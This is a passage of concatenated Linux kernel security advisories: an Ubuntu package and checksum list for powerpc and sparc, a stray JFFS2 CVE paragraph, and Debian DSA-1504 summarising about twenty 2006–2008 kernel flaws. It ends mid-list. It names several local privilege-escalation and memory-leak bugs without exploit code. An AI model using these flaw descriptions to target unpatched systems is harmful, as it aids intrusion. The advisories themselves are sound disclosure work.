http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb
  Size/MD5:    64204 798e06a268e472b302ac454923bb8fff
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb
  Size/MD5:    65326 9bb7b418effcabd5475064b802298513
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb
  Size/MD5:   144018 f89fc6a4bde46e09fd834ec2c1d0be34
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb
  Size/MD5:   162726 8783bd1c8e200777fd0e15cc56fe7e27
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/irda-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb
  Size/MD5:   383360 7a9030fdb88ccbf2e89ce3b715573e22
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/irda-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb
  Size/MD5:   251804 a96beb008b4c309fea0b2c70fa4a0701
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb
  Size/MD5:  2157386 6eedcab4ef93369216268e2f8b0c26d4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb
  Size/MD5:  3083266 6c385c18cb2c37a7daade1a05bec7f04
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-powerpc-smp_2.6.20-16.32_powerpc.deb
  Size/MD5:   867372 b754e4a9e0afa690e32edd569293e9db
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-powerpc64-smp_2.6.20-16.32_powerpc.deb
  Size/MD5:   872512 90df82454a635f1c87711ab7153baef9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-powerpc_2.6.20-16.32_powerpc.deb
  Size/MD5:   867756 f9a2940c66d49b3ca08ed5727f289a6b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16_2.6.20-16.32_powerpc.deb
  Size/MD5:  8150058 fd6f76d544b89ef32463788c42c5c2d0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-powerpc-smp_2.6.20-16.32_powerpc.deb
  Size/MD5: 24516198 a2f8d2fc427fe4cdb83ea6601e5ef3e4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-powerpc64-smp_2.6.20-16.32_powerpc.deb
  Size/MD5: 26857866 2bb21d740c71e6e88e1ebd9e599ce242
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-powerpc_2.6.20-16.32_powerpc.deb
  Size/MD5: 24217722 2f3a2276e62c30a7ee1bcc4375b2e5b8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-powerpc-smp_2.6.20-16.32_powerpc.deb
  Size/MD5:  2127364 92acf167bdd7d6f1e45334ac47ea30e1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-powerpc64-smp_2.6.20-16.32_powerpc.deb
  Size/MD5:  2853718 1f3937836ac7988cfc8120fa1c8f3f0b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-powerpc_2.6.20-16.32_powerpc.deb
  Size/MD5:  2049008 754fb343fde63edba537f4997059d246
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-libc-dev_2.6.20-16.32_powerpc.deb
  Size/MD5:   644216 aa89e704afe7bb649a3702a3e80bdbc9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/md-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb
  Size/MD5:   253014 53f79f58e8c8c8c6a91f5a6fa68b3323
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/md-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb
  Size/MD5:   295090 27b41c8c7bce8577d2fc92ee91ff02fb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb
  Size/MD5:   155552 948610c5856311a389cc24147c51b4c8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb
  Size/MD5:   168440 0ae30519a5c6845c1df222dd0997a830
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb
  Size/MD5:   248186 10ab9437d64b36107f135d8b1e8384a0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb
  Size/MD5:   279958 a2a840b34ef74ba6ea055ae6ed25aa68
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb
  Size/MD5:  1110518 cdae9930bc591ed0d464c0e627ce9fc2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb
  Size/MD5:  1110674 cf7767bcf24b10a6468a001cc61a705f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb
  Size/MD5:  1951232 50acb8ab3ce0c1068b7db1cb83c8b803
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb
  Size/MD5:  2253534 7e377ce517ec668fbdffdf8cf68bbb8f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-pcmcia-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb
  Size/MD5:   233498 a911deb6f677d23573e2c04d21cd4c0b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-pcmcia-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb
  Size/MD5:   223084 d1d5b711af7b606cc3cb152cd2b302f1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb
  Size/MD5:   172826 e224814b4f4cb3a4857ef0bcf1807660
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb
  Size/MD5:   205452 b7e452eed99d75a3237cd6af0b652751
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb
  Size/MD5:   280976 36b2890d2776223330cb998ef91fe7a2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb
  Size/MD5:   316592 6058abd33a87379478812445a4ce6152
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb
  Size/MD5:    44654 429c32a7686b6994e51008ad510addef
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb
  Size/MD5:    43404 2b938cd722e60e0c8a7bc162d9c9b23b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb
  Size/MD5:    41214 9d76ac755e0135b9ac5929f737d8df92
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb
  Size/MD5:    53676 f9d8fb50d39d9533195aeccfde6aeb06
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb
  Size/MD5:    72808 7e1591057c11080e073a7d1308079e03
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb
  Size/MD5:    85286 408f3cca715bdbadedf3c88add2d7942
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-storage-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb
  Size/MD5:    74538 9371b8ecda2dc38409eb7f5e81323382
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-storage-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb
  Size/MD5:    29716 915f7e92919e3e5f6a714fb6a764e7c4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/plip-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb
  Size/MD5:     8396 6fff7a2df52f845977fb0391065c9eb4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/plip-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb
  Size/MD5:     9876 1bb149a422eecea6437b3096455a7214
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ppp-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb
  Size/MD5:    56160 3b23cbe3a708bd41208df683665c99a5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ppp-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb
  Size/MD5:    67412 b805f503e4e4a9172093732085ee3258
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb
  Size/MD5:    86632 65853e2605f97918c2da7d3714d47f9c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb
  Size/MD5:   129216 02647d33297ca3a79309e3d85c7af63b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-firmware-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb
  Size/MD5:   322568 dfb941aaf4550bf6126c0169f83258f3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-firmware-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb
  Size/MD5:   322594 4baf1f3fa8df218422fadab681fb213b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb
  Size/MD5:  1415796 56f376a091bf794cad12803e8ea9223a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb
  Size/MD5:  1345418 d86ddf950d422e5dff25b4ff75be8be0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb
  Size/MD5:    74226 ffc5e0c6c3c9ba36f8a70bdda703ffd7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb
  Size/MD5:    83236 016e73b6c71ea3e6ce50fc6e9e400733
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/socket-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb
  Size/MD5:    12016 38db6e08e04535827c310f6f3b75bb8f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/socket-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb
  Size/MD5:    13944 59f761c4730861063999252fd9c7b3f4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/speakup-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb
  Size/MD5:    78348 e105eefca5ef971dfebaa7db9922fa7e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/speakup-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb
  Size/MD5:    85460 13a378acfc0739831360f256098c6e2b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/storage-core-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb
  Size/MD5:   398178 14adf5249c5f2b7b697ee2951e65ab6b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/storage-core-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb
  Size/MD5:   445184 0014efb118af6d57ca7012d50abfde25
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb
  Size/MD5:    76714 e53854cc5527187805a655bd505e4fcb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb
  Size/MD5:   100182 5de41587783ba1ceebcaca202d46bdbd

sparc architecture (Sun SPARC/UltraSPARC):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-16-sparc64-di_2.6.20-16.32_sparc.udeb
  Size/MD5:    53734 6adc5476b8288e943d269fe136f9597e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fat-modules-2.6.20-16-sparc64-di_2.6.20-16.32_sparc.udeb
  Size/MD5:    42162 7419be9e0f5436873f2a40e52c1afd31
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/firewire-core-modules-2.6.20-16-sparc64-di_2.6.20-16.32_sparc.udeb
  Size/MD5:   211714 1d9919982182d8ed7578eb9e9c4bb6fd
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-core-modules-2.6.20-16-sparc64-di_2.6.20-16.32_sparc.udeb
  Size/MD5:   607894 d46f67e29a5655fde3a34b4148e34b20
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-secondary-modules-2.6.20-16-sparc64-di_2.6.20-16.32_sparc.udeb
  Size/MD5:   142712 5e8e8dbf4cd995f76e17b2fbecb04364
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-16-sparc64-di_2.6.20-16.32_sparc.udeb
  Size/MD5:    51446 16795f24d7cdb9fa4021e2a9c2f5ddf9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-16-sparc64-di_2.6.20-16.32_sparc.udeb
  Size/MD5:    37416 d33bb0862b56b544342582b47d43c5bb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-16-sparc64-di_2.6.20-16.32_sparc.udeb
  Size/MD5:   151158 048512894c8d13521481dbd2eb596c70
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-16-sparc64-di_2.6.20-16.32_sparc.udeb
  Size/MD5:  1930624 f875b4fa41f898441804a75dac77a6b7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-sparc64-smp_2.6.20-16.32_sparc.deb
  Size/MD5:   779972 fca011328622db95da614823eb859877
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-sparc64_2.6.20-16.32_sparc.deb
  Size/MD5:   778754 2a07efbbbf11de98f41c6acaf204d688
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16_2.6.20-16.32_sparc.deb
  Size/MD5:  8120614 63034f7095956cf9e0482a70f17b4268
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-sparc64-smp_2.6.20-16.32_sparc.deb
  Size/MD5: 16954948 4118b2381a068300bca6dbd218274359
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-sparc64_2.6.20-16.32_sparc.deb
  Size/MD5: 16591664 75cc0965716c29a3fcea210c9e9568a3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-sparc64-smp_2.6.20-16.32_sparc.deb
  Size/MD5:  2263152 880c4d7bc6a681ea4d44a6422b470bd7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-sparc64_2.6.20-16.32_sparc.deb
  Size/MD5:  2177076 96a928cc6852bab2880404ee864b8513
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-libc-dev_2.6.20-16.32_sparc.deb
  Size/MD5:   699392 04a5aa594fd799d6d28d1e448082ff53
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/md-modules-2.6.20-16-sparc64-di_2.6.20-16.32_sparc.udeb
  Size/MD5:   264350 70461d55e370af1410e7076ee7707293
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-16-sparc64-di_2.6.20-16.32_sparc.udeb
  Size/MD5:   156580 d912fb65f3dfebe6abb54731f1482469
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-16-sparc64-di_2.6.20-16.32_sparc.udeb
  Size/MD5:   241030 8e8cfa59c4eb226e54508975e86ae4be
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-16-sparc64-di_2.6.20-16.32_sparc.udeb
  Size/MD5:  1110530 e5514e1ad110fd4fda4bd241e89786ab
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-16-sparc64-di_2.6.20-16.32_sparc.udeb
  Size/MD5:  1571944 468cbc5568cd30adf5c7df1c2a8b717b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-16-sparc64-di_2.6.20-16.32_sparc.udeb
  Size/MD5:   180396 b0cfe237ce9422954dbccc5fdfe083b8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-16-sparc64-di_2.6.20-16.32_sparc.udeb
  Size/MD5:   310090 fff041405cf72a7036b2108c5927d687
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-16-sparc64-di_2.6.20-16.32_sparc.udeb
  Size/MD5:    39670 682731910162d545b9de9f43a94303ce
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-16-sparc64-di_2.6.20-16.32_sparc.udeb
  Size/MD5:    37986 d9c40538f074c1b736fa85436bb5c267
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/plip-modules-2.6.20-16-sparc64-di_2.6.20-16.32_sparc.udeb
  Size/MD5:     8646 5754f2b90039fdc8828d72e5a11f0b0f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ppp-modules-2.6.20-16-sparc64-di_2.6.20-16.32_sparc.udeb
  Size/MD5:    59416 bb6cb420320b901278779187ccda14dd
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-16-sparc64-di_2.6.20-16.32_sparc.udeb
  Size/MD5:    90822 fe71fffbab34ef164725a453777bbc69
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-firmware-2.6.20-16-sparc64-di_2.6.20-16.32_sparc.udeb
  Size/MD5:   322568 eeb3653225a6d79ca5439c35016a0ed5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-16-sparc64-di_2.6.20-16.32_sparc.udeb
  Size/MD5:   882448 1c0cf5b18dc1b87f6d492c95c2db8631
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-16-sparc64-di_2.6.20-16.32_sparc.udeb
  Size/MD5:     9828 7acb6badfb2aff16e367c3f41138e8ea
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/storage-core-modules-2.6.20-16-sparc64-di_2.6.20-16.32_sparc.udeb
  Size/MD5:   290228 5a13e5423896527a1198f5ccbc13152e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-16-sparc64-di_2.6.20-16.32_sparc.udeb
  Size/MD5:    54800 878d9b94c8b02143f8a84063365fd340

.

CVE-2007-4849

Michael Stone reported an issue with the JFFS2 filesystem. Legacy
modes for inodes that were created with POSIX ACL support enabled
were not being written out to the medium, resulting in incorrect
permissions upon remount.

These problems have been fixed in the stable distribution in version 2.6.18.dfsg.1-13etch3.

At the time of this advisory, the build for the arm architecture has not yet completed. This advisory will be updated once the arm build is available. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1


Debian Security Advisory DSA-1504 security@debian.org http://www.debian.org/security/ dann frazier February 22, 2008 http://www.debian.org/security/faq


Package : kernel-source-2.6.8 (2.6.8-17sarge1) Vulnerability : several Problem-Type : local Debian-specific: no CVE ID : CVE-2006-5823 CVE-2006-6054 CVE-2006-6058 CVE-2006-7203 CVE-2007-1353 CVE-2007-2172 CVE-2007-2525 CVE-2007-3105 CVE-2007-3739 CVE-2007-3740 CVE-2007-3848 CVE-2007-4133 CVE-2007-4308 CVE-2007-4573 CVE-2007-5093 CVE-2007-6063 CVE-2007-6151 CVE-2007-6206 CVE-2007-6694 CVE-2008-0007

Several local and remote vulnerabilities have been discovered in the Linux kernel that may lead to a denial of service or the execution of arbitrary code. The Common Vulnerabilities and Exposures project identifies the following problems:

CVE-2006-5823

LMH reported a potential local DoS which could be exploited by a malicious
user with the privileges to mount and read a corrupted cramfs filesystem.

CVE-2006-6054

LMH reported a potential local DoS which could be exploited by a malicious
user with the privileges to mount and read a corrupted ext2 filesystem.

CVE-2006-6058

LMH reported an issue in the minix filesystem that allows local users
with mount privileges to create a DoS (printk flood) by mounting a
specially crafted corrupt filesystem.

CVE-2006-7203

OpenVZ Linux kernel team reported an issue in the smbfs filesystem which
can be exploited by local users to cause a DoS (oops) during mount.

CVE-2007-1353

Ilja van Sprundel discovered that kernel memory could be leaked via the
Bluetooth setsockopt call due to an uninitialized stack buffer. This
could be used by local attackers to read the contents of sensitive kernel
memory.

CVE-2007-2172

Thomas Graf reported a typo in the DECnet protocol handler that could
be used by a local attacker to overrun an array via crafted packets,
potentially resulting in a Denial of Service (system crash). 
A similar issue exists in the IPV4 protocol handler and will be fixed
in a subsequent update.

CVE-2007-2525

Florian Zumbiehl discovered a memory leak in the PPPOE subsystem caused
by releasing a socket before PPPIOCGCHAN is called upon it.

CVE-2007-3105

The PaX Team discovered a potential buffer overflow in the random number
generator which may permit local users to cause a denial of service or
gain additional privileges. This issue is not believed to effect default
Debian installations where only root has sufficient privileges to exploit
it.

CVE-2007-3740

Steve French reported that CIFS filesystems with CAP_UNIX enabled 
were not honoring a process' umask which may lead to unintentinally
relaxed permissions.

CVE-2007-3848

Wojciech Purczynski discovered that pdeath_signal was not being reset
properly under certain conditions which may allow local users to gain
privileges by sending arbitrary signals to suid binaries.

CVE-2007-4133

Hugh Dickins discovered a potential local DoS (panic) in hugetlbfs. 
A misconversion of hugetlb_vmtruncate_list to prio_tree may allow
local users to trigger a BUG_ON() call in exit_mmap.

CVE-2007-4308

Alan Cox reported an issue in the aacraid driver that allows unprivileged
local users to make ioctl calls which should be restricted to admin
privileges.

CVE-2007-4573

Wojciech Purczynski discovered a vulnerability that can be exploited
by a local user to obtain superuser privileges on x86_64 systems. 
This resulted from improper clearing of the high bits of registers
during ia32 system call emulation. This vulnerability is relevant
to the Debian amd64 port as well as users of the i386 port who run
the amd64 linux-image flavour.

CVE-2007-5093

Alex Smith discovered an issue with the pwc driver for certain webcam
devices. If the device is removed while a userspace application has it
open, the driver will wait for userspace to close the device, resulting
in a blocked USB subsystem. This issue is of low security impact as
it requires the attacker to either have physical access to the system
or to convince a user with local access to remove the device on their
behalf.

CVE-2007-6063

Venustech AD-LAB discovered a a buffer overflow in the isdn ioctl
handling, exploitable by a local user.

CVE-2007-6151

ADLAB discovered a possible memory overrun in the ISDN subsystem that
may permit a local user to overwrite kernel memory leading by issuing
ioctls with unterminated data.

CVE-2007-6206

Blake Frantz discovered that when a core file owned by a non-root user
exists, and a root-owned process dumps core over it, the core file
retains its original ownership. This could be used by a local user to
gain access to sensitive information.

CVE-2007-6694

Cyrill Gorcunov reported a NULL pointer dereference in code specific
to the CHRP PowerPC platforms.

CVE-2008-0007

Nick Piggin of SuSE discovered a number of issues in subsystems which
register a fault handler for memory mapped areas.

The following matrix lists additional packages that were rebuilt for compatibility with or to take advantage of this update:

                             Debian 3.1 (sarge)
 kernel-image-2.6.8-alpha    2.6.8-17sarge1
 kernel-image-2.6.8-amd64    2.6.8-17sarge1
 kernel-image-2.6.8-hppa     2.6.8-7sarge1
 kernel-image-2.6.8-i386     2.6.8-17sarge1
 kernel-image-2.6.8-ia64     2.6.8-15sarge1
 kernel-image-2.6.8-m68k     2.6.8-5sarge1
 kernel-image-2.6.8-s390     2.6.8-6sarge1
 kernel-image-2.6.8-sparc    2.6.8-16sarge1
 kernel-patch-powerpc-2.6.8  2.6.8-13sarge1
 fai-kernels                 1.9.1sarge8

We recommend that you upgrade your kernel package immediately and reboot the machine. If you have built a custom kernel from the kernel source package, you will need to rebuild to take advantage of these fixes.

Upgrade Instructions


wget url will fetch the file for you dpkg -i file.deb will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update will update the internal database apt-get upgrade will install corrected packages

Debian 3.1 (oldstable)


Oldstable updates are available for alpha, amd64, hppa, i386, ia64, m68k, powerpc, s390 and sparc.

Source archives:

http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-s390/kernel-image-2.6.8-s390_2.6.8-6sarge1.dsc Size/MD5 checksum: 846 4503eeaf9e1a21a9f220e2d9c31e0123 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-image-2.6.8-ia64_2.6.8-15sarge1.dsc Size/MD5 checksum: 1191 bfba4b91bbd166d14d0bace5ac137715 http://security.debian.org/pool/updates/main/k/kernel-source-2.6.8/kernel-source-2.6.8_2.6.8-17sarge1.diff.gz Size/MD5 checksum: 1124155 d0e37e157fd2c4a9889222377ae6a956 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-s390/kernel-image-2.6.8-s390_2.6.8-6sarge1.tar.gz Size/MD5 checksum: 18572 fffdd006af1f26150eb6131f10c14c8f http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-hppa/kernel-image-2.6.8-hppa_2.6.8-7sarge1.tar.gz Size/MD5 checksum: 73206 97e4fadb9612c1a9ce969a0cbdc663f4 http://security.debian.org/pool/updates/main/f/fai-kernels/fai-kernels_1.9.1sarge8.dsc Size/MD5 checksum: 621 fd5cf0a4b08aadf72cedb8029390fdeb http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-image-2.6.8-amd64_2.6.8-17sarge1.dsc Size/MD5 checksum: 1103 27f8b65b1acae74eac82f6484edbc5e5 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-alpha/kernel-image-2.6.8-alpha_2.6.8-17sarge1.tar.gz Size/MD5 checksum: 44625 4e68e046835cd0dce3ba2dc096f21924 http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-patch-powerpc-2.6.8_2.6.8-13sarge1.tar.gz Size/MD5 checksum: 32565 406db278e655291be89254da5a4e15f8 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-hppa/kernel-image-2.6.8-hppa_2.6.8-7sarge1.dsc Size/MD5 checksum: 1013 defcdc70dd9d969ddfaed2819b341758 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-image-2.6.8-ia64_2.6.8-15sarge1.tar.gz Size/MD5 checksum: 69734 a5e62e3da21f1e89e1c7f76508de9673 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-image-2.6.8-amd64_2.6.8-17sarge1.tar.gz Size/MD5 checksum: 82008 c90b3a12c9bf77807d0d5c3ab6cf1567 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-m68k/kernel-image-2.6.8-m68k_2.6.8-5sarge1.tar.gz Size/MD5 checksum: 22997 75027ce480514543ad6d565d43890a3e http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-sparc/kernel-image-2.6.8-sparc_2.6.8-16sarge1.tar.gz Size/MD5 checksum: 32414 676fdb7a2c0cb66cd6c13a75b836f755 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-sparc/kernel-image-2.6.8-sparc_2.6.8-16sarge1.dsc Size/MD5 